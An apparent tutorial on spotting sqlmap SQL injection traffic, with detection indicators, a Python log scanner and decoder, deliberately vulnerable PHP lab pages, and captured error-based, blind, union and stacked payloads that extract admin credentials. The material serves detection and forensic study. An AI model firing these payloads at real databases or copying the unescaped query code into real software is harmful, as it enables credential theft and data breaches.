Disclaimer: this article is shared for learning purposes only ~
Contents
SQL injection traffic analysis
Characteristics
sqlmap injection types
Building the vulnerable environment
error_sql
bool_sql
time_sql
union_sql
Stacked Queries
Inline Queries
SQL injection traffic analysis
References:
https://www.freebuf.com/column/161797.html
SQLMAP attack traffic characteristic analysis (SQLMAP攻擊流量特征分析_sqlmap流量特征), CSDN blog
Characteristics:
1. The sqlmap User-Agent in the request headers: user-agent: sqlmap/1.*.*.*#dev (http://sqlmap.org)
2. Special (illegal) characters: single quote ', double quote ", parentheses (), quote plus parenthesis '( and "(, and similar.
   eg: http://localhost/index.php/?id=1'and+1=1--+
   eg: http://localhost/index.php/?id=1 and 1=1 -- -   and   1 and 1=2 --+
3. SQL commands/statements (INSERT, DELETE, UPDATE, SELECT, or several of them chained together).
   eg: url/?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) -- -
   eg: url/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
4. Comment markers: two consecutive hyphens -- (the rest of the statement becomes a comment) or /* ... */.
5. The universal password fragment in the URL: 'or'1'='1 (and/or tautologies).
6. Common functions and keywords: database(), updatexml(), extractvalue(), group_concat(), concat(), limit, order by, union, system_user(), version(), load_file(), sleep(), length(), exp(), group by, substr(), and, or.
   eg: ?id=1" and updatexml(1,concat(0x7e,database()),3) --+
   eg: ?id=-1' union select 1,2,sleep(5)--+
   eg: 1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users)),1) #
7. Encodings (URL encoding, base64, ...): decode with Burp or an online decoder and then look for the fields above.
8. Abnormal parameter length, illegal characters, abnormal requests, error responses, unusual traffic volume.
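The indicator list above turned into a small scanner, as an added example (this is not code from the original post). It reads a constructed access log in the form METHOD URI "User-Agent", undoes repeated URL encoding, looks inside base64-looking parameter values, and reports which indicators each request triggers. The log lines, the log format and the 100-character "abnormal length" threshold are assumptions made for the demo.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote

# Indicators from the list above, as regexes over each decoded parameter value.
INDICATORS = {
    "quote/paren": re.compile(r"""['"()]"""),
    "sql statement": re.compile(r"\b(select|union|insert|update|delete|drop)\b", re.I),
    "comment marker": re.compile(r"--[\s-]|#|/\*.*?\*/"),
    "universal password": re.compile(r"""['"]\s*or\s*['"]?1['"]?\s*=\s*['"]?1""", re.I),
    "sql function": re.compile(
        r"\b(database|updatexml|extractvalue|group_concat|concat|system_user|version|"
        r"load_file|sleep|benchmark|length|exp|substr(?:ing)?|mid|ord|elt|floor|rand)\s*\(",
        re.I),
    "boolean tautology": re.compile(r"\b(and|or)\s+\S+\s*(=|!=|<>|>|<)", re.I),
    "sql keyword": re.compile(r"\b(order\s+by|group\s+by|limit\s+\d)", re.I),
}
UA_RE = re.compile(r"^sqlmap/", re.I)          # e.g. sqlmap/1.8#stable (https://sqlmap.org)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
LOG_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<uri>\S+) "(?P<ua>[^"]*)"$')
MAX_PARAM_LEN = 100  # assumed threshold for "abnormal parameter length"


def fully_decode(value, rounds=3):
    """Undo repeated URL encoding (%2527 -> %27 -> ') used to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def maybe_base64(value):
    """Decoded text if `value` is base64 wrapping printable ASCII, else None."""
    if not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_text(text):
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def analyze_request(uri, user_agent=""):
    """Sorted indicator names triggered by one request."""
    hits = set()
    if UA_RE.search(user_agent):
        hits.add("sqlmap user-agent")
    for _, value in parse_qsl(uri.partition("?")[2], keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl already did one round and '+' -> ' '
        hits |= scan_text(value)
        inner = maybe_base64(value)
        if inner is not None and scan_text(inner):
            hits.add("base64-encoded payload")
            hits |= scan_text(inner)
        if len(value) > MAX_PARAM_LEN:
            hits.add("abnormal parameter length")
    return sorted(hits)


# Constructed access log (not a real capture): METHOD URI "User-Agent".
SAMPLE_LOG = """\
GET /index.php?id=1 "Mozilla/5.0"
GET /index.php/?id=1'and+1=1--+ "Mozilla/5.0"
GET /index.php?id=-1'+union+select+1,2,sleep(5)--+ "Mozilla/5.0"
GET /index.php?id=1%2527%2520and%25201%253D1--%2520- "Mozilla/5.0"
GET /login.php?user=admin&pass=JyBvciAnMSc9JzE= "Mozilla/5.0"
GET /index.php?id=1 "sqlmap/1.8#stable (https://sqlmap.org)"
"""


def scan_log(text):
    """{line_no: indicators} for every parsable line of the log."""
    results = {}
    for no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if m:
            results[no] = analyze_request(m["uri"], m["ua"])
    return results


if __name__ == "__main__":
    for no, hits in scan_log(SAMPLE_LOG).items():
        print(no, hits or "-")
```

The quote, parenthesis and # indicators are noisy on their own (a search for "it's" or a colour value like #fff trips them), so they work as a score together with the others rather than as a single rule; comment markers and function calls with parentheses are the strong signals. The sqlmap User-Agent is the weakest one, because sqlmap's --random-agent option replaces it.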
sqlmap injection types
B  Boolean-based blind
E  Error-based
U  Union query-based
S  Stacked queries
T  Time-based blind
Q  Inline queries
Building the vulnerable environment
phpstudy
xxx.php:
<?php
// Connect to the MySQL database
$conn = new mysqli("localhost", "root", "password", "test_db");
// Check the connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
// Take the user input
$id = $_GET['id'];
// Build the SQL query: $id is concatenated unescaped, which is the injection point
$sql = "SELECT * FROM users WHERE id = $id";
// Run the query. On PHP 8.1+ (default mysqli error reporting) a failing query throws
// mysqli_sql_exception, whose message carries the MySQL error text that error-based injection reads.
$result = $conn->query($sql);
if ($result->num_rows > 0) {
    // Print the rows
    while ($row = $result->fetch_assoc()) {
        echo "id: " . $row["id"] . " - Name: " . $row["name"] . " - Email: " . $row["email"] . "<br>";
    }
} else {
    echo "0 results";
}
$conn->close();
?>
xxx.html:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title>SQL</title>
</head>
<body>
    <h1>SQL injection test</h1>
    <form action="error_based_injection.php" method="GET">
        <label for="id">User ID:</label>
        <input type="text" id="id" name="id" placeholder="Enter a user ID">
        <button type="submit">Submit</button>
    </form>
</body>
</html>
error_sql:
sqlmap 1.8#stable
Pattern: xxx OR sqlxxx
Error-based: the payload deliberately provokes a SQL error, and the database's error message is used to read back structure or data.
1 OR 1=1
Characteristics:
response length; queries that produce errors
one value per request (the data comes out one row at a time)
fixed error-page lengths (e.g. 543, 596, 323)
the data is carried inside the error text
xxx OR sqlxxx: the OR makes the condition true regardless of the original value, so the SQL that follows it is evaluated.
Payloads seen in the traffic (the first one is sqlmap's injection check, the next two read id and password from sql_ll.admin):
id=1 OR (SELECT 9674 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT (ELT(9674=9674,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
/error_based_injection.php?id=1 OR (SELECT 9694 FROM(SELECT COUNT(*),CONCAT(0x717a7a6a71,(SELECT MID((IFNULL(CAST(id AS NCHAR),0x20)),1,54) FROM sql_ll.`admin` ORDER BY id LIMIT 2,1),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
/error_based_injection.php?id=1 OR (SELECT 1967 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT MID((IFNULL(CAST(password AS NCHAR),0x20)),1,54) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
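How the three error-based payloads above leak data, worked in Python as an added example (not code from the original post). sqlmap wraps the value it wants between two random marker strings written as hex literals (0x7170626a71 is "qpbjq"), then builds a GROUP BY key with FLOOR(RAND(0)*2); MySQL evaluates that key more than once while filling the temporary table for the derived query, hits an already-inserted key, and fails with "Duplicate entry ... for key 'group_key'", so the wrapped value lands in the error text. The request/response pairs below are constructed to match the page's payloads; the leaked values are sample data, not the lab's real rows.

```python
import re
from urllib.parse import unquote

HEX_RE = re.compile(r"0x(?:[0-9a-fA-F]{2})+")
# Inner shape of the error-based payloads above:
#   CONCAT(<marker1>,(<subquery>),<marker2>,FLOOR(RAND(0)*2))x ... GROUP BY x
PAYLOAD_RE = re.compile(
    r"CONCAT\((?P<m1>0x[0-9a-fA-F]+),\((?P<query>.+)\),(?P<m2>0x[0-9a-fA-F]+),"
    r"FLOOR\(RAND\(0\)\*2\)\)")
DUP_RE = re.compile(r"Duplicate entry '(?P<key>.*?)' for key")


def hex_to_str(literal):
    """0x7170626a71 -> 'qpbjq'; MySQL reads a hex literal as a byte string."""
    return bytes.fromhex(literal[2:]).decode("latin-1")


def decode_hex_literals(text):
    """Replace every 0x.. literal with its text form (markers, UNION strings, 0x7e -> '~')."""
    return HEX_RE.sub(lambda m: hex_to_str(m.group(0)), text)


def parse_error_payload(uri):
    """(marker1, subquery, marker2) for an error-based request, markers decoded; else None."""
    m = PAYLOAD_RE.search(unquote(uri))
    if m is None:
        return None
    return hex_to_str(m["m1"]), m["query"], hex_to_str(m["m2"])


def extract_from_error(body, marker1, marker2):
    """The value sqlmap placed between its markers in a 'Duplicate entry' error.
    The digit after marker2 is FLOOR(RAND(0)*2), part of the GROUP BY key, not data."""
    dup = DUP_RE.search(body)
    if dup is None:
        return None
    key = dup["key"]
    start = key.find(marker1)
    end = key.find(marker2, start + len(marker1)) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    return key[start + len(marker1):end]


def decode_exchange(uri, body):
    """One request/response pair -> (subquery, leaked value), or None if not error-based."""
    parsed = parse_error_payload(uri)
    if parsed is None:
        return None
    m1, query, m2 = parsed
    return query, extract_from_error(body, m1, m2)


# Constructed request/response pairs shaped like the payloads above (sample values,
# not the lab's real rows): the injection check leaks ELT(9674=9674,1) = "1", the
# second payload leaks the id of the third admin row.
CHECK_URI = ("/error_based_injection.php?id=1 OR (SELECT 9674 FROM(SELECT COUNT(*),"
             "CONCAT(0x7170626a71,(SELECT (ELT(9674=9674,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x "
             "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)")
CHECK_BODY = "Duplicate entry 'qpbjq1qzzzq1' for key 'group_key'"
DATA_URI = ("/error_based_injection.php?id=1 OR (SELECT 9694 FROM(SELECT COUNT(*),"
            "CONCAT(0x717a7a6a71,(SELECT MID((IFNULL(CAST(id AS NCHAR),0x20)),1,54) "
            "FROM sql_ll.`admin` ORDER BY id LIMIT 2,1),0x716a7a7671,FLOOR(RAND(0)*2))x "
            "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)")
DATA_BODY = "Duplicate entry 'qzzjq3qjzvq1' for key 'group_key'"

if __name__ == "__main__":
    for uri, body in ((CHECK_URI, CHECK_BODY), (DATA_URI, DATA_BODY)):
        print(decode_exchange(uri, body))
```

MySQL truncates the key it prints in the Duplicate entry message, which is why the page's payloads read MID(...,1,54): 54 characters plus the two 5-character markers fit within that limit, and longer values are fetched in slices and stitched together. decode_hex_literals() also turns the marker literals in the UNION payload further down (0x71786b6a71 ... 0x716b626a71) back into text, which is the quickest way to tell a sqlmap union probe from a hand-written one.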
bool_sql:
URL-encoded characters in the traffic: %3E is >, %2C is ,
Manual form: 1 AND SUBSTRING((SELECT password FROM admin WHERE id=1), 1, 1) = 'a'
id=1 AND 4823=4823 (the always-true check). Data comes out one character at a time, and each answer is read from the response length.
Extracting single characters this way produces a very large amount of traffic, e.g.:
id=1 AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>1
To decode it, read the injected SQL together with the response length:
/error_based_injection.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),1,1))>64
A normal request ("0 results") is 323 bytes, so:
TRUE: rows returned (response longer than 323 bytes)
FALSE: "0 results" (323 bytes)
(>102 FALSE, >101 TRUE → ORD = 102 = 'f')
Wireshark filter for the TRUE responses: http && frame.len>323
time_sql:
Manual form: 1 AND IF(SUBSTRING((SELECT password FROM admin WHERE id=1), 1, 1) = 'a', SLEEP(5), 0)
Judge each probe by the response time:
/error_based_injection.php?id=1 AND (SELECT 7090 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(password AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),16,1))>112,0,2)))))hUpu)   sleeps 2 s
SLEEP(2-(IF(cond,0,2))) sleeps 2 s when the condition is true and 0 s when it is false, so again one character comes out per request (TRUE: about 2 s, FALSE: well under 2 s), judged by the delay.
Request times from the capture (probes >102, >1, !=103, >96, >48, >103 on positions 4 and 5 of the username in row LIMIT 3,1; the probe marked 2s is the one that slept):
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>104,0,2)))))LXmR)
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>102,0,2)))))LXmR)   2s
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>103,0,2)))))LXmR)
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))!=103,0,2)))))LXmR)
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>96,0,2)))))LXmR)
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>48,0,2)))))LXmR)
id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>1,0,2)))))LXmR)
Script to pull the decoded request URI and the response delay (http.time) out of the pcap with pyshark:
import pyshark
from urllib.parse import unquote
import re

# Only HTTP responses whose request carried the injected parameter
paks = pyshark.FileCapture(
    r"C:\Users\26255\Desktop\time_sql.pcapng",
    tshark_path=r"E:\wireshark\tshark.exe",
    display_filter='http.response && http.request.full_uri contains "id=1%20"')

s = ''
for pak in paks:
    # getattr: the fields are missing when tshark could not pair the response with its request
    request_uri = getattr(pak.http, 'request_uri', None)
    request_time = getattr(pak.http, 'time', None)   # http.time: seconds since the request
    if request_uri:
        urlde_uri = unquote(request_uri)
        # pattern = r"(!=|>)\s*(\d+)"
        # mat = re.findall(pattern, urlde_uri)
        # s += str(mat) + '\n' + request_time + '\n'
        s += urlde_uri + '\n' + str(request_time) + '\n'
    else:
        print("No request URI found in this packet")

print(s)
with open(r"C:\Users\26255\Desktop\1.txt", 'w') as f:
    f.write(s)
union_sql:
id=1 UNION ALL SELECT NULL,CONCAT(0x71786b6a71,0x6f48516a4d5573666e654c6559775242444467706f766f7a6e70726b71575650426f5a7858764a64,0x716b626a71),NULL-- -
Characteristic: the response is somewhat longer than a normal one, because the UNION adds sqlmap's marker string (the hex literals above) to the page.
UNION query: a second SELECT is appended to the original one (select ... UNION select ...) and both result sets come back together.
Stacked Queries:
Pattern: sqlxxx ; sqlxxx
Reference: Stacked Queries (堆疊注入), CSDN blog
Again one character per request, judged with SLEEP; the separator is ;
Judge by the response time:
/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>114),SLEEP(1),1881)#   1s
/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>115),SLEEP(1),1881)#
/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))!=115),SLEEP(1),1881)#
xxx.php for stacked injection:
<?php
// Connect to the MySQL database
$conn = new mysqli("localhost", "root", "root", "sql_ll");
// Check the connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
// Take the user input
$id = $_GET['id'];
// Build the SQL query: $id is concatenated unescaped
$sql = "SELECT * FROM users WHERE id = $id";
// multi_query() runs every ;-separated statement, which is what makes stacked injection possible here
if ($conn->multi_query($sql)) {
    do {
        if ($result = $conn->store_result()) {
            while ($row = $result->fetch_assoc()) {
                echo "Name: " . $row["name"] . " - Email: " . $row["email"] . "<br>";
            }
            $result->free();
        }
    } while ($conn->next_result());
} else {
    echo "Query failed: " . $conn->error;
}
$conn->close();
?>
xxx.html:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title>Stacked query injection test</title>
</head>
<body>
    <h1>Stacked query injection test</h1>
    <form action="stacked_injection.php" method="GET">
        <label for="id">User ID:</label>
        <input type="text" id="id" name="id" placeholder="Enter a user ID">
        <button type="submit">Submit</button>
    </form>
</body>
</html>
Inline Queries:
(inline query, sqlmap technique Q)
Rather than terminating the statement or stacking a second one with ;, the payload embeds a subquery inside the original query's expression, e.g. id=(SELECT ...), so the inner SELECT's result is substituted into the outer query. It needs no statement separator and no multi-statement execution, which distinguishes it from stacked queries.